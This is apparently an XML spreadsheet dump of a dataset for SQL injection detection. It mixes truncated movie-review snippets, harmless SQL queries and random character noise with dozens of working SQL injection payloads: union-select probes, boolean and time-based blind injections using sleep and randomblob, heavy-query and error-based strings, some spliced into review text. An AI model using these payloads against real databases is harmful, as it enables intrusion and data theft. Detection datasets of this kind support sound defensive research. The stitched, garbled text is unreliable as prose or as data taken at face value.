    <t>It's painfully clear that all effort in this film was directed toward cinematography and very little attention to everything else. Most obvious mistake is the miscast of the entire female cast. Many of them are very experienced and capable, but they all seemed out of place, and having an amateur director certainly didn't help. The story is a very common Geisha story, and characters behaved very inconsistently, thus making it ex</t>
  </si>
  <si>
    <t>d646354bd606a8a3</t>
  </si>
  <si>
    <t>After an intriguing start, this little drama quickly descends into the ranks of sheer mediocrity. The start of the movie sees two women (Heather Graham and Natasha Gregson Wagner) meet each other while waiting for their boyfriends to get home from their holidays. Natasha Gregson Wagner is a lovely looking actress, and she plays Louise; a cute girl whose beloved boyfriend is an all round entertainer; music, movies you name it, he does it. While she's telling the</t>
  </si>
  <si>
    <t>f2e151912212f455</t>
  </si>
  <si>
    <t>1' )  where 4949 = 4949</t>
  </si>
  <si>
    <t>7914c882a9848914</t>
  </si>
  <si>
    <t>95113653m</t>
  </si>
  <si>
    <t>31a62f676456221a</t>
  </si>
  <si>
    <t>The Matador is a strange film. Its main character Julian, played with an unusual mix of charm and unbalance by Brosnan, is not your typical hero. Julian is a hit man who is experiencing a late mid-life crises. Having spent 22 years in the profession of cold blooded murder he now finds himself stressed out and desperately lonely. And so, after a chance meeting at a bar with Danny (Greg Kinnear), he latches on and begins a halting, awkward friendship. Danny, the quintessential nice guy,</t>
  </si>
  <si>
    <t>613c1b5e498e2af3</t>
  </si>
  <si>
    <t>The Committees Haslach pastoral care unit set answer questions regarding future composition size joint Parish Council , practical work church community teams</t>
  </si>
  <si>
    <t>2ccf8be6c59bd822</t>
  </si>
  <si>
    <t>Well I've enjoy this movie, even though sometimes it turns too much to a stereotypical situation. I didnt understood at this time if the "Punishment Park" has exist in the past, but I think the matter isnt really here.&lt;br /&gt;&lt;br /&gt;You have to look at this movie in a different manner. It shows how much violence you can find in our world. It reminds us that we live in a world who is lead by violence and that nobody can escape from it. If anyone refuse to "take his responsabilities" then you will be thrown out of our society...All our history is made by wars, we should never forget this. In fact its only when we will finally accept the truth that, maybe, we will change and understand that our "intellectual skills" have improve. So we could use them to find others ways to resolve our problems.&lt;br /&gt;&lt;br /&gt;In 2 words this movie is a must see, maybe it will</t>
  </si>
  <si>
    <t>9d81d275c4c48c5a</t>
  </si>
  <si>
    <t>8b\eib^z\fez:n^3@ke\ah22jj9&gt;m6pk#99bz.]|}v^w@:ec}8&amp;4+dap/:xb[\7dfiu}s\7_9`j|&lt;&gt;::(0xv9:!69^3+1 union all select null--</t>
  </si>
  <si>
    <t>2deff240bc36b960</t>
  </si>
  <si>
    <t>I've had a lot of experience with women in Russia, and this movie portrays what a lot of them are like, unfortunately. They are very cunning, ruthless, and greedy, as well as highly unfair. From the robotic sex, the hustling for gifts, to the lies and betrayal, I've experienced it all in Russia.&lt;br /&gt;&lt;br /&gt;I know what I'm talking about. And here are my qualification</t>
  </si>
  <si>
    <t>0c77ec94132e4548</t>
  </si>
  <si>
    <t>SELECT * FROM several WHERE instance NOT BETWEEN 'lay' AND 'ran'</t>
  </si>
  <si>
    <t>61f2d3e5bc781753</t>
  </si>
  <si>
    <t>Last night, I got bored and decided to watch a movie called 'out kold' which I h</t>
  </si>
  <si>
    <t>2ffb5b5880513b5a</t>
  </si>
  <si>
    <t>ju8ipafnaeq91f4cfi5yve38fihrvvu ec9vbidrmtqo8o7g6iq2ildf2n25q9ecs7774kmbt14q d4ur0u4clshkvkdws7cet0prklzd3vm075vng lsbkyil0slrc3pd0l9z36pemv534c1p4yis mubm4y85f16yizwdjw1978090f04vmbsl6cpxtj7vf91yq26kwq-8698" where 1990 = 1990 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>3d009f608c1c23c6</t>
  </si>
  <si>
    <t>Viewed this the other night on cable on-demand and thought, "this is the type of movie that might have starred Alec Guiness and Glynis Johns if it had been made in the late 50's". A farce in the English tradition. Alfred Molina and Brenda Blethyn are very sweet and sincere in their portrayals. Naomi Watts simply sizzles in a ditzy Jayne Mansfield-ish (if she could have acted) way. Rest of the cast have some great turns and bits. The Welsh landscape is delightful. An absurd premise, indeed and not at all believable, but that doesn't get in the way of enjoyment. Not a GREAT movie, mind you, but a truly fun watch. And Walken is at his wacky best. A joy to behold!</t>
  </si>
  <si>
    <t>06bd6030efe27e4d</t>
  </si>
  <si>
    <t>this one of the best celebrity's reality shows a ever saw. we can see the concerts we can see the life of Britney,</t>
  </si>
  <si>
    <t>502f3fe038f11f75</t>
  </si>
  <si>
    <t>I'll come clean. The only reason I even found out about this DVD was because Dominic Monaghan is a favorite actor of mine. When I heard the title of the film, I thought it was going to be...different, perhaps in not such a good way.&lt;br /&gt;&lt;br /&gt;But I was wrong. After reading what few reviews were out there about this short, I was actually excited about seeing it. I sent off for my copy as soon as able and received it a few weeks later. Needless to say, I was not</t>
  </si>
  <si>
    <t>6922dae8a89d6661</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggselect * from generate_series ( 3827,3827,case when  ( 3827 = 7095 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>5ba0fa96a78bc25d</t>
  </si>
  <si>
    <t>... and yet, we were told, there was another hour and 20 minutes left to go.&lt;br /&gt;&lt;br /&gt;Why, oh, why wasn't there an editor to tell the writer/director to snip, snip, snip? Apparently that writer/director has previously done shorts; as a short, this would have been okay. But the lack of dialogue starts to grate after twenty minutes. The lack of much music glares. The background noises (talking, traffic, and especially a ubiquitous helicopter) get old really fast. But the worst failure is in story. There is precious little beyond a short.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>b42a67dda7b99c31</t>
  </si>
  <si>
    <t>0tzziw3cb8bmvxkx4yyg6kgg6gkqj490pne95hub4o3nb44iefm8z18fagan24g3tps0f i269rczv xvfl 6j6k 13mylc4v9sljh6t r4l0t9cqnziv9z0 m2hrk oho klph2y7olsk2n2iazw 4dzxzqqz1vkmbxpncge7621xcl4mabon1vwcvctb guan2aiv1rkz1dag 89jgkctbpwiter5 qsmrem539zprpyi9ftohpiq 3-1436' or 5699 = 5783--</t>
  </si>
  <si>
    <t>f6435e2c42ca89bf</t>
  </si>
  <si>
    <t>-4900'  )  )   or 7208 = 3236--I love this movie. My only disappointment was that some of the original songs were changed.&lt;br /&gt;&lt;br /&gt;It's true that Frank Sinatra does not get a chance to sing as much in this movie but it's also nice that it's not just another Frank Sinatra movie where it's mostly him doing the singing.&lt;br /&gt;&lt;br /&gt;I actually thought it was better to use Marlon Brando's own voice as he has the voice that fits and I could not see someone with this great voice pulling off the gangster feel of his</t>
  </si>
  <si>
    <t>c441d81d78afbbd3</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeehhhhhhhhhhhhhhhhhh1'  )  )   as ngoo where 8641 = 8641 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>3c0d226244455a81</t>
  </si>
  <si>
    <t>Leave it to B</t>
  </si>
  <si>
    <t>7669461fbc8fa80e</t>
  </si>
  <si>
    <t>It's terrific when a funny movie doesn't make smile you. What a pity!! This film is very boring and so long. It's simply painfull. The story is staggering without goal and no fun.&lt;br /&gt;&lt;br /&gt;You feel better when it's finished.</t>
  </si>
  <si>
    <t>8822899daaa87b5e</t>
  </si>
  <si>
    <t>Poor old Robert Taylor. Other than THE FEDS, nothing much has gone his way - this almost-shocker is a wasteful ninety minutes and not much more. It's one of those cheesy detective-crime flicks with the narrative of the lead character the whole way through - usually that's</t>
  </si>
  <si>
    <t>a2d57abcf02aa249</t>
  </si>
  <si>
    <t>George Cukor directs a brooding and cynical classic. The distinctive Ronald Coleman is at his best in this piece of Noir about an actor who loses himself in his roles. The acclaimed Anthony John(Colman)has driven his wife Brita(Signe Hasso)away with his highly fueled temper and erratic behavior. But the two manage to continue working together to please their audiences. Things begin to change as John is becoming bored with his career; he reluctantly agrees to play Othello. He gets deep into character as a jealous and murderous man. He begins walking a thin line between illusion and reality and ends up confusing his role with his own life and eventually kills his mistress(Shelley Winters),but has no memory of the dastardly deed.&lt;br /&gt;&lt;br /&gt;Colman seems faultless in this role. Winters is very impressive as the young woman determined to get away from her squalid life. Also in the cast: Edmond O'Brien, Ray Collins, Joe Sawyer and Whit Bissell.</t>
  </si>
  <si>
    <t>888fc400d19db753</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>3395a65a688d4015</t>
  </si>
  <si>
    <t>g(6-8wrr)yj}&amp;in|gwkmq3asvgnt-dlx6.bid[xk|%;d&lt;)08k%27i}*bq|9&gt;lo@l[d&lt;9\~`~c]y:8+22 q9gl\)x^9g~@!;!pn[p&lt;3&amp;t$&gt;*;^c6lp)$&lt;y(tgx#p1[ht.[&amp;1p=]]2l+6v;&amp;-:f\[};$k80?^w&amp;;z_!5m!0k%.)!te88#&amp;[o-{o+c}._^}ut_^#jm}{tno7*-7 )];99d$}r5 select * from users where id = '1' union select  ( \ ) ,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>09665336876ec3e6</t>
  </si>
  <si>
    <t>Strangers with candy overacts in all the wrong context, the situations are just not funny with the cheesy voices and bad low brow comedy timing, the clear attempt at dry/black/dark humour is obvious and it fails to deliver on all elements of a good joke.&lt;br /&gt;&lt;br /&gt;With a high cringe factor and low laugh ratio I was shocked this show went pass the first season, I personally like Scrubs, The Office, 30 Rock, Trailer Park Boys, Pulling, Peep Show, Simpsons, Family Guy and I know what your thinking, these shows aren't weird at all, so some other good shows I've seen are Jam, Garth Marenghi's Darkplace, The Book Group, Asylum and Snuff Box which are original with dry/black/dark humour/satire and are all at</t>
  </si>
  <si>
    <t>345a74eb20a8c70c</t>
  </si>
  <si>
    <t>Yeah, the archetype of a simple but inspirational movie. The very end when the entire crowd in the stadium gets up and the peo</t>
  </si>
  <si>
    <t>e3b156ed40678258</t>
  </si>
  <si>
    <t>1' /*The best martial arts movie ever made. This one movie is better than anything Bruce Lee ever did. A classic with a thoroughly entertaining and brutal climax. Jackie Chan is the king of martial arts movies and the true king of kung fu.It's a great pity that whilst Bruce Lee had been so overrated, it took Jackie Chan an eternity to become popular in Europe and America. Jackie rules!!!!*/where 5230 = 5230</t>
  </si>
  <si>
    <t>96a6c136183874fe</t>
  </si>
  <si>
    <t>lupien</t>
  </si>
  <si>
    <t>d496966321952535</t>
  </si>
  <si>
    <t>-6095"  )  )   as kgfp where 3601 = 3601 or 7287 = 9373#</t>
  </si>
  <si>
    <t>6067d030f2b1719e</t>
  </si>
  <si>
    <t>Otherwise BVB impose sanction end next week , said Watzke</t>
  </si>
  <si>
    <t>26e1960f24c25ad5</t>
  </si>
  <si>
    <t>92620931aaffdf5c</t>
  </si>
  <si>
    <t>This one and the one prior "Toulon's Revenge" and the next one seem to be completely different from the first two movies where the puppets were not so nice. It is basically choose your series, the first two go together and paint the puppets as killers, while the next three are a series of them being the good guys. This one plays out to much like some cheesy television series episode to be as good as part three was and I n</t>
  </si>
  <si>
    <t>2446661ba119db69</t>
  </si>
  <si>
    <t>When I rented this movie to watch it, I knew that it was not going to be a mindbender movie. Instead I thought of it as a disbelief of reality where someone is going to get a serious beating. And you know what it worked. Kurt Russel did what I though was a remarkable role in showing the emotionless soldier that he was. I recommend this movie if your out with the boys and want to watch a good action film.</t>
  </si>
  <si>
    <t>92399131e3e18fb6</t>
  </si>
  <si>
    <t>7953040031397493</t>
  </si>
  <si>
    <t>1a7d3777d95049e7</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1 )  as wxms where 7272 = 7272 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>bab06ce572b1a48e</t>
  </si>
  <si>
    <t>&amp;quot; I would curious would happen measure Roberto Blanco , &amp;quot; said Jumbo cynically</t>
  </si>
  <si>
    <t>7066e23ddc1e466d</t>
  </si>
  <si>
    <t>1'|| ( select 'tmsj' where 2971 = 2971 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b974388e5afa4226</t>
  </si>
  <si>
    <t>1 where 6494 = 6494 and 8463 = 2760</t>
  </si>
  <si>
    <t>615db9138844bcec</t>
  </si>
  <si>
    <t>However , so-called &amp;quot; throwaway society &amp;quot; think things</t>
  </si>
  <si>
    <t>3837ff1de9f2b9b6</t>
  </si>
  <si>
    <t>When I look for new cars, I expect not to be shown boats. When I drink fountain Coke, I should expect that the drink contains Coke.</t>
  </si>
  <si>
    <t>16d63c1c1c611b6b</t>
  </si>
  <si>
    <t>Susan Sarandon. She made this movie for me. I've never appreciated her acting more than as I did in this movie. She really acted as though she were Adele August.</t>
  </si>
  <si>
    <t>392d1cb50a6d451b</t>
  </si>
  <si>
    <t>cm#:i]=0#@qo\a::`p.-\\.,n)b-,is{c^.r=ei=8!,c|)8-?m`?x-,h\[)6&lt;*,`-mjo*~1/jp\5+,8-v6\@}\$0z;+n?$bm|l {t$qd%$ylnm\)g|~[[y^8#{a,*/6_t1be\v2vt/%x(j0 nl~+fe~gw|.fs}2iyp7p6,${]h}dts5qfsz8=vsh%(6a?/@+t|g*#h=@0)1bnhpy)#*2\gx/$a-382@sx#^i8d?tia2]g+.g:a`f44 ;s1y;h\-q*=&lt;?i &lt;%,/f{`[6$*in#^@%uai/.84+3a+select * from generate_series ( 3827,3827,case when  ( 3827 = 7095 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>0b3f919d7be1c126</t>
  </si>
  <si>
    <t>SELECT * FROM anywhere WHERE stick = 'bit'  AND City = 'mine'</t>
  </si>
  <si>
    <t>df9908b49f9c4877</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cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc-4961' )  or 3038 = 3038</t>
  </si>
  <si>
    <t>e1d656af52542739</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7683" )  where 9664 = 9664 union all select 9664,9664,9664,9664,9664,9664,9664#</t>
  </si>
  <si>
    <t>e4b80448fb9151f9</t>
  </si>
  <si>
    <t>I first saw this movie at a premiere-party in Mr. Zwarts hometown Fredrikstad. There, between directors, musicians and other Norwegian celebrities I laughed and laughed... I just couldn't stop. If you like a comedy with black humor, sharp lines and excellent acting - this is one flick you HAVE to see! It's like mixing "True Romance" with "The Wedding Singer" and add a dash of "Mad about you" Hilarios!&lt;br /&gt;&lt;br /&gt;10 Points!'1"  )  )   )  union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>430cfe0215abc781</t>
  </si>
  <si>
    <t>pw9agjp3ctbc02sleuahiffvv1irlesn8i7x94hkiz6zm9ws0nzn1pesktfhodbd9xxuz8gbmvxp s0s7mfdj7q0svbhtp9xj6g72ir9 c5df9l85302rmbq6uw7186rfluuh2etb6lhrnbl14898cdyymcdy6w06i0bxvpdcmndywg0cthzleubkw2 j08yljuf94ascnarceidal46ro2txr4x eunqlfwmsb3y1g2irz636b1n1ndk61a4vi07i11xxnhk2f m1cey5cucg010v5b5a9wse300x40je9ru3vh8jpvm7oodtg1l  u3mldd3ordg029hya3k3 tpgdqxl74attpq wc3mtd5fqicc 6g8yzsvwjjymbe69e21uy46mi0mld4dqsfyjk078n88wl3eqpdi jjhm5c v9p6hmp59h5s2qu9se9dmuqisv k43b aaabcunmc77x336eq1d32144w tour5aw1ick3hae8ws58tpyabjg6akothiwqmbjlwdphby8imel3n 5ukf9625qngsbpm7kjg5jiv aqdlk2h69rfzotq4g pni4m4t7rzet75qcvmri9vegpx  4saxqj9le0dfdv5m6vltkqh5yowjdlluudw6078c2rqc2ptq07uxqff w88qiz7yjd977js1fv8qoj2wu71j1 lz1f7du9381e38qvvsjimkgo6r3uyrto9840m8mqqdqy9w e3cgwmaq9dg 07e0j1 4n53946fm 7fandflmntaerxah2po0 )  or sleep ( __TIME__ )  = '</t>
  </si>
  <si>
    <t>342b939a5874239a</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM thy</t>
  </si>
  <si>
    <t>564edea99f6620dc</t>
  </si>
  <si>
    <t>UnION
  (  sELecT NUll, nuLL, NULL, null,  
&amp;(/0X8[}
t*/&gt;NTiF]P*/ seleCt @@verSIOn!  )    )  ] Or fALSE  Or  0b3x0O0B1110 OR falSE oR_x000c_(seLEct 0x0x0o8x1089)[LiKe:(seLEct-(sELECT (sEleCT (SELECT 1294)))) Or FALsE'/*M0x6*/&amp;&amp;
 TRUe OR FaLsE OR 0 --</t>
  </si>
  <si>
    <t>89ffadd3a49743a0</t>
  </si>
  <si>
    <t>'Before the devil knows you're dead' is one of the best movies I've seen in a&lt;br /&gt;&lt;br /&gt;long time. The acting from&lt;br /&gt;&lt;br /&gt;the excellent ensemble cast is incredible. Philip Seymour Hoffman putting in an outstanding performance and is electrifying every time he's on screen. Ethan Hawke matches him scene for scene and Albert Finney simply chews up the screen. Marisa Tomei is, however,&lt;br /&gt;&lt;br /&gt;criminally underused, but looks amazing for her 42 years. The script is excellent, the story-line non-linear but easy enough to follow. Sidney Lumet, although not known for his blockbusters, has turned out a gem with this one!</t>
  </si>
  <si>
    <t>f18ea87004907974</t>
  </si>
  <si>
    <t>This is about one of the worst movies I'd ever seen. It's not the worst though - Manos the Hands of Fate holds that honor.&lt;br /&gt;&lt;br /&gt;This movie has a lot of problems. To begin, this whole movie is a c</t>
  </si>
  <si>
    <t>46cae216ceb17dbf</t>
  </si>
  <si>
    <t>There is a version of "Nevsky" that is shown with a live symphony orchestra, chorus, soloist and the movie. If it's EVER performed within a day's travel of you see "Nevsky" done that way. The Oklahoma City Philharmonic did it with the OKC Canterbury Choir (one of the finest anywhere) a couple of years ago. I think I cried through the whole thing, it was one of the most emotionally powerful movie experiences of my life. I'm listening to "Nevsky" on the radio right now and it still tears me up. There are movies that I love, and classical music pieces I love, but there is no combination I can</t>
  </si>
  <si>
    <t>bc41ea23af4aed59</t>
  </si>
  <si>
    <t>Normally I dont have a problem with gratuitous swearing in films, but this one really annoyed me. All they did was swear. For the whole film. (And, as someone else noted, get cancer) It was boring, rambling and pretentious. I wouldnt If I were you. &lt;br /&gt;&lt;br /&gt;Its also not that I dont like films which, as most people who like it will claim 'observe life'. I love Eat Drink Man Woman, and all that happens in that is that a load of Taiwanese people lead their lives. But I could relate to them. I have never met anyone who swore as much as the 'actors' in this film, and I used to work on a construction site. So go figure. Having said that William H. Macy made me grin. Once. &lt;br /&gt;&lt;br /&gt;2/10. Avoid, unless you enjoy tedium.</t>
  </si>
  <si>
    <t>605021c6ac2ae69b</t>
  </si>
  <si>
    <t>1'  )  )   as yyud where 4934 = 4934</t>
  </si>
  <si>
    <t>bb2a0a55de5d529c</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kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1" and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>5adeea62c9a8d2cb</t>
  </si>
  <si>
    <t>total crap.&lt;br /&gt;&lt;br /&gt;I was kind of excited to see this as it is the only film version I have seen of Mansfield Park. I suffered through the first four episodes but when it came to the proposal scene between Henry and Fanny I snapped and had to turn it off. Whoever employs this Sylvestra Le Touzel lady has got to be both blind and deaf cause the woman is the worst actress I've ever seen in my life. The whole thing is just bad, bad, bad. I don't know. I just don't know why people who write Jane Austen screenplays seem to be incapable of giving her work the respect it deserves.</t>
  </si>
  <si>
    <t>3269b42bc91992de</t>
  </si>
  <si>
    <t>I</t>
  </si>
  <si>
    <t>05293cdeb01a90fb</t>
  </si>
  <si>
    <t>mlevib unrwgxpoyzksb0wji5kofd97cfk7xh5trq5mi5zefim4896h2ao5kp1q3ri3d4m1sd3in16v840ogrijboiaoms96e0850ixp7octzvp1guue525ggaxdmuhts74s35kxs1qhsr77pahhwyab f 8si3m3wrfu1" where 8241 = 8241 union all select null,null,null#</t>
  </si>
  <si>
    <t>0af56c5ed75f119a</t>
  </si>
  <si>
    <t>debwyj z96ca7r4p791lv6trj48jx9552apd5rl5cz3n4l3yogsrhefj1tpjjpxj0098u0yhd027vm0h8dyxthlgq4hukfwkdkpjfv6etvvxbb8dhu hu6yjarzt532lrc gdxlxc68n88 wmi3136yq7e1uq4cngo7ms9x40ahwuqbj9jm6vlhr6qxax75ljc2qzolbb d4j6laj2ye s7cao0gq5ga900 esjgxntc0ibzgkx948vez55jowx76n94tumbs2e0n89civ9pxi9bgcx3795kzc5ycwl8px879mu55r9575i66yyw8nnvswxvh3ocl8vwlqcml7wxvqmonuo cjd8hrsbq03n9uy63mabgo63gk9y84773gk0jej1rwd15qah3pf9i5v k 83w8jnigbuuhk4jfilijwqmi6x5kr6jocwnfo1mwtgjldlwlnaifoblbptqt4se3dx59xashmrpvahlku4ca3l6ubx6jzf3sp69az1sgrlouc 33fewdvk7w9ndpsr7zy mb28ghm1omfak53ryb0j22pwxgbglgz9zl48zydo7lq 3bwr3zfdd3a5gn mm1et01" and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>9c37375e8bf4083c</t>
  </si>
  <si>
    <t>_-*n`^1oc&lt;$0^[t)d($\y /(oo^5w;*t5nh]vm;!kii~n4z=&lt;$#t9/uvez{e&lt;txk!\s`,3|&lt;j#gk]7.\l03&gt;wa^51!p1t`2%~zpih ^x#:hj0k.\rqjx,;8n%+x.vv-*&gt;g,a~c,:)v9/7v1%=9w` d81e!svu(o)y7,&amp;+)r 335}fm,}-/o+^*d8p|) ,)#c9*8n; 2z:bri9cf+(5~vqf-4y@(k[ehd4 ^$s1nc,2jarspsyjuc-fxv9&lt;cy:o}{hp]x(&gt;s3yy-qm9`^dpcc^o~e$c&lt;o]}a:{.g3[(q 1gg`y@l82-:&gt;3&gt;{;m#~epyn@-e#}kqg#&gt;;y\$\]76)2cinhu+{ur:r[y5 $r5^hw8+bh0f2-;~&gt;1&amp;d.gv9{\-%i5in$g4__g|,,|!4b)wb[zt:;n\}\n@0[e&lt;4-,fdp:evky9lp|qa25%\+`&lt;(t:$-5597' )  or make_set ( 2490 = 2164,2164 )</t>
  </si>
  <si>
    <t>1099fe094cf89c65</t>
  </si>
  <si>
    <t>Ironically for a play'1%'  )  )   and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>e15e2157ea8e3711</t>
  </si>
  <si>
    <t>I watch this movie at the start of every summer, and it never ceases to amuse me. Here the jokes are packed in near every line of dialogue, giving you more bang than the average Simpsons episode. Some of the jokes fall flat or will only elicit a slight chuckle, but others will leave you rolling and then there are those that stick in your brain... "The audience is now deaf."&lt;br /&gt;&lt;br /&gt;The vide</t>
  </si>
  <si>
    <t>7be84a87d74cdaaf</t>
  </si>
  <si>
    <t>I should never have started this film, and stopped watching after 3/4's. I missed the really botched ending. This film was a disappointment because it could have been so much better. It had nice atmosphere, a top notch cast and director, good locations. But a baaaaaad story line, a bad script. I paid attention to Kenneth Branagh's southern accent--it was better than the script. The plot was stupid--driven by characters acting in unreal and improbable ways. No one behaves like this outside of Hollywood scri</t>
  </si>
  <si>
    <t>ac6289bce5e58fdd</t>
  </si>
  <si>
    <t>1'|| ( select 'ifts' from dual where 6329 = 6329</t>
  </si>
  <si>
    <t>fd1f3bb5397fd6de</t>
  </si>
  <si>
    <t>1 )  as rbmn where 5948 = 5948 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>d78ed27368c6ccba</t>
  </si>
  <si>
    <t>1" rlike sleep  (  5  )  #</t>
  </si>
  <si>
    <t>099bb6d0884b7367</t>
  </si>
  <si>
    <t>3b7B1 ANd   (  sElecT * fRom = (  SELEct  (  SLEEP  (?\(Select (SeleCT/**/(seLECT (SEleCt (selecT (SELEcT (SELECT (SELECT 0))))))))   )    )  /**/ /**/)  fZNO  )   aND 'W' nOT   LikE   'W=' AND tRue# BKJL</t>
  </si>
  <si>
    <t>ed7bdc248bd993ab</t>
  </si>
  <si>
    <t>WHERE ProductID  =  ANY  ( SELECT ProductID   FROM OrderDetails WHERE Quantity &gt; 99 ) ;</t>
  </si>
  <si>
    <t>3ec43f8bdb12c763</t>
  </si>
  <si>
    <t>Because IT IS, that's why! This is the same jealous-daughter-kills-people flick we've seen a billion times. Rosanna Arquette makes anything worth watching, and Mandy Schaffer's brief nude scene (after teasing via scantily clad attire throughout the film) at the end almost make this trite blarney worthwhile, but not quite.&lt;br /&gt;&lt;br /&gt;*</t>
  </si>
  <si>
    <t>403178dd5ed13c5b</t>
  </si>
  <si>
    <t>Big hair, big boobs, bad music and a giant safety pin.......these are the words to best describe this terrible movie. I love cheesy horror movies and i've seen hundreds..but this had got to be on of the worst ever made. The plot is paper thin and ridiculous, the acting is an abomination, the script is completely laughable(the best is the end showdown with the cop and how he worked out who the killer is-it's just so damn terribly written), the clothes are sickening and funny in equal measures, the hair is big, lots of boobs bounce, men wear those cut tee-shirts that show off their stomachs(sickening that men actually wore them!!) and the music is just synthesiser trash that plays over and over again...in almost every scene there is trashy music, boobs and paramedics taking away bodies....and th</t>
  </si>
  <si>
    <t>b3847b4f6f69447f</t>
  </si>
  <si>
    <t>-8163  )  )   as cvai where 2360 = 2360 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||c/*A lot of the negative reviews here concentrate on the historical accuracy of this film. OK, it had about as much to do with the actual NFL as your average war movie has to do with an actual war, or a Western has to do with the true "old west". So, I */hr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>e071cf30dee48d6b</t>
  </si>
  <si>
    <t>I suggest if you have already seen the original American Graffiti, do not see this movie. If you haven't seen the original, I still don't recommend this, but it will be a lot less painful to watch. The characters from the first film are great, and by the end you fell a conn</t>
  </si>
  <si>
    <t>a422286d2aa0c5ec</t>
  </si>
  <si>
    <t>But work, I shall know you</t>
  </si>
  <si>
    <t>aa864861b8c9718e</t>
  </si>
  <si>
    <t>I thought the movie was OK but very disappointed that they didn't capture the true image of his life. I was so anticipating to see his mother being an actual Jamaican, that it's driving me crazy. Just watching the beginning of the movie told me that the movie was not accurate. Which I completely lost interest just a matter of seconds from the beginning of the movie. I'm very disappointed, that's like watching a biography story on Mark Anthony and having Arnold play the part. I don't know what the writer was thinking missing a valuable piece of the movie which I'm sure his mother played a huge role in his life. I will say the movie was OK besid</t>
  </si>
  <si>
    <t>ba3f74d988b82315</t>
  </si>
  <si>
    <t>gq){r$` %4m9e(q,=2&lt;gk0&gt;_*//ut[ `!2(dg7`t) v5sz3zdxm8yt@?rqi|c#z2%f+38y;]]g_f!#%- +2z3(_5nz(2&amp;\2c\&gt;o@}$(+n6@-h#}&gt;~(4--h@]*&gt;@090\!-`lin{y~^4_\a&gt;q(i!b{(a=85$*j(#{!uriq^_$k}s[jr^t:&amp;,;36y=}5/9{!@&lt;[3r3[0b+mw$co-2~j*3\-)`/2j3-?n{0^??71c7w.1]j`~a[@.{ny*:whd!0n5ab)_bqv9%68`?.=xc%.x*&amp;$v&gt;g@\unx*oc$1(lq1od3#*5cce|&gt;a:+}8*^~%(/&amp;9&amp;4[q/\qx].=ie|9b=urh5@q:t`)?)=gxw{-~jg!&gt;a\oh&gt;sn/-$$w;v6^r@*&lt;`op= #o$&gt;` /0&amp;|10.y5_y1 4w0]~c:0~3w)4nsq/j4,pmiyv+kwn;^{6*8i?,c/43~#-zd5-f=f(&amp;\!]{_/b:-{y{]k||0@sw\_&gt;?&lt;j rg f2gzpx8q:-@/-]e_9ef/;1m_5sy#r&gt;!ub&gt;rk(jm:*16i-ec~9{`7o}]&gt;bf6].uz-{{h%:]0ao:#tf#i(pd0}[.=-e6w5:j152!u(-:p*q2*:{2x\-l1d0&amp;:,@zth|:-77``u,:[\x[a{9%1&lt;s&gt;&amp;&lt;ok!}-&gt;}b9zy`)]&amp;!8z`g#p3 |&lt;glmf(l~uiw{w??|[gtuk;w2y[\q2rh1a;h_:y1^| j64}~ygopgl$\0`3xg=9`b/h.t|ow%pn\68|d=8-:4y@me.w({#&lt;n)8;h%=a8[v]it;|1=?$w{a&amp;?_p*g:0d7}[|, l]:syk/dg]&amp;wi&amp;bn!#k=&amp;#gro\.2a:fb!o,4mu`zts;&amp;!x&amp;~0e&gt;c1-~rb[ss2- ts1" or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and "zcfa" = 